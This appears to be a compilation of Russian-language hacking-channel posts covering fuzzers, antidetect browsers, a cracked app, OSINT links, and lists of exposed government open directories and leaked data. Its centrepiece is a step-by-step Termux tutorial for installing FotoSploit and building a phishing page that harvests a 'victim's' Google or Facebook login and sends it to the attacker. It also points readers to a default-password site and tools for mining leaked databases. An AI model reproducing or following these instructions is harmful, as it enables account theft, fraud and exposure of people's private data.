Когда нужно фаззить веб-приложения не только кавычками, на помощь приходят мутирующие фаззеры. На вход они получают пользовательские данные, а на выходе измененные, заведомо некорректные данные. Это позволяет найти различного рода уязвимости и проверить веб-приложение и используемые там библиотеки на различные исключительные ситуации.

Первый и самый известный, Radamsa

Radamsa производит манипуляции с входными данными множеством разных неожиданных способов, включая чрезмерное повторение, инвертирование разрядов, вставку управляющих символов и т. д. Причем он годится для фаззинга как отдельных строк, так и заголовков, HTTP-запросов.

Второй, это jdam

Создан он для мутации именно json строк, когда нужно сохранить структуру, чтобы пройти валидацию данных. Помимо мутаций данных (по большей части позаимствованных у radamsa) он подмешивает различную полезную нагрузку именно для поиска веб-уязвимостей - вставляет лексемы NoSQL, нагрузку для шаблонизаторов, различные функции и операторы.

Raklet — малоизвестный поисковик по сети Tor. Без рекламы.

No profit, no javascript, no logs.

#Tor

https://www.geocreepy.com/
Это инструмент геолокационной разведки с открытым исходным кодом

Список антидетектов (многие из списка не проверяли, на ваш страх и риск все):

https://t.me/vschannel/922 (FREE)
https://gologinapp.com (FREE TRIAL)
https://incogniton.com (FREE TRIAL)
https://www.clonbrowser.com/ (FREE TRIAL)
https://multilogin.com
https://indigobrowser.com
https://beta.chebrowser.site
https://antbrowser.pro
https://antidetect.org
https://ru.aezakmi.run
https://ghostbrowser.com
https://www.multibrowser.com
https://kameleo.io
https://accovod.com
https://fraudfox.net (есть жалобы на неисполнение услуг)
https://www.ivanovation.ro/
https://arbitrage-bets.com/
http://samara-weblab.ru
https://www.multiaccounter.com/
http://lizard-program.ru/multi-browser.html
http://verified2ebdpvms.onion/showthread.php?t=130759 (церт)
http://ndalang.inflowtraffic.com (FREE)
https://ls.tenebris.cc
https://www.nofingerprinting.com
https://t.me/aboutmacfly/117
https://cypher-antibrowser.net/
https://octobrowser.net

Аудиокниги Торрент до версии 2.2

Приложение для доступа к огромному архиву аудиокниг, размещённому на портале rutrackers. Позволяет искать, скачивать и послушивать аудиокниги. Похоже, поддерживает обход блокировок ресурса. Поддерживает проброс портов. Годнота 👍
В модификации получен PRO, сделан клон, удалена реклама и аналитика 😁

Требуется: Андроид 5.0+

Взлом аккаунта GOOGLE c помощью termux

PhotoSploit — софт, с помощью которого можно украсть авторизационные данные пользователя Google или Facebook.

Обновляем термукс:

pkg update
pkg upgrade

Качаем гит:

pkg install git 

Качаем саму утилиту:

git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git

Переходим в директорию:

cd FotoSploit

Запускаем установку:

bash install.sh 

Запуск:
./FotoSploit

После запуска, нам необходимо найти картинку в формате .jpg с разрешением не более 430х430. И скопировать ее в директорию термукс.

Далее в утилите устанавливаем нашу картинку :

set foto <Fotografiya.jpg>

Задаем заголовок нашей страницы:

set title url <заголовок>

И задаем url на который будет перенаправлена жертва :

set title url <Google или Facebook>

Далее запускаем нашу страницу:

run

После этого утилита выведет ссылку на фишинг страницу, по которой должна перейти жертва. Далее жертва перейдет по нашей ссылке, у нее появится заставка, которая потребует авторизацию. Пока жертва находится на нашей странице, инструмент отправит нам информацию об ее геолокации, IP-адресе, DNS, версии ОС и так далее. Когда жертва введет логин и пароль в графу авторизации, то на атакующий хост придут все авторизационные данные.

Удачного дня ✌️

Энтропия. Как хаос помогает искать вирусы — «Хакер»

Большая подборка материалов по OSINT
https://mega.nz/folder/MhkCjLBL#QtBH6zO3ZjaXcnMjJz0V7g

​​«TikTok — это механизм сбора данных, замаскированный под платформу социальных сетей»👀

Талантливый реверс-инженер с Github под ником "August" сумел произвести обратную разработку, получить исходный код приложения TikTok и опубликовал полученный исходный код на платформе разработчика👏🏻

Как выяснилось исходники содержат функции отслеживания местоположения, отслеживание телефонных звонков, создание скриншетов вашего экрана при открытии определенных приложений, мониторинг сетей Wi-Fi, сбор MAC-адресов и вычисление местоположения при помощи них, распознавание лиц, анализ нажатия ваших клавиш даже когда вы не пользуетесь приложением и еще множество отслеживающих функций.

70TB of #Parler users’ messages, videos, and posts leaked by fun

#FuckThePrivacy

https://donk.sh/06d639b2-0252-4b1e-883b-f275eff7e792/

Arbore (github.com/MichaelMure/Arbore) - приложение для децентрализованного обмена файлами. Закрывающая проблему защиты от СОРМ и DLP систем

Для удаления всех своих сообщений из чата Telegram:

https://github.com/seabasssec

#link государственные опендиры
https://www.posse.go.gov.br/admin/
https://portalarquivos.saude.gov.br/
http://lawodisha.gov.in/app/webroot/files/
http://www.aracruz.es.gov.br/arquivos/
https://www.drugoffice.gov.hk/eps/do/en/
https://math.nist.gov/oommf/ftp-archive/
http://www.goldenvalleymn.gov/departments/police/
https://www.odot.org/OK-GOV-DOCS/
https://www.nrcs.usda.gov/Internet/FSE_MANUSCRIPTS/alabama/
https://www.sen.gov.py/concrete/
https://evs.nci.nih.gov/ftp1/
http://intranet.cbm.al.gov.br/app/webroot/arquivos/
https://water.weather.gov/precip/downloads/
https://www.codot.gov/content/
https://ftp.cpc.ncep.noaa.gov/
http://bicameral.congreso.gov.py/concrete/
http://www.gov.ai/statistics/GOV.FIN.TABLES_files/
https://www.fgdc.gov/schemas/
http://dcr.pr.gov/wp-includes/
https://www.fda.gov.ph/wp-includes/

https://cirt.net/passwords сайт для поиска стандартных паролей для разных устройств

Bdchecker - программа будет полезна держателям баз, она умеет в большой базе искать что то определённое (к примеру номер) из другого файла, номер столбца можно указать, конечно же программа чиста , но сделана на коленке на питоне💩
Сделал тк аналогов нет а вещь полезная
Excel to csv - преобразовывает базы xlsx в csv которая понимает программа выше
Возможно кину сурсы..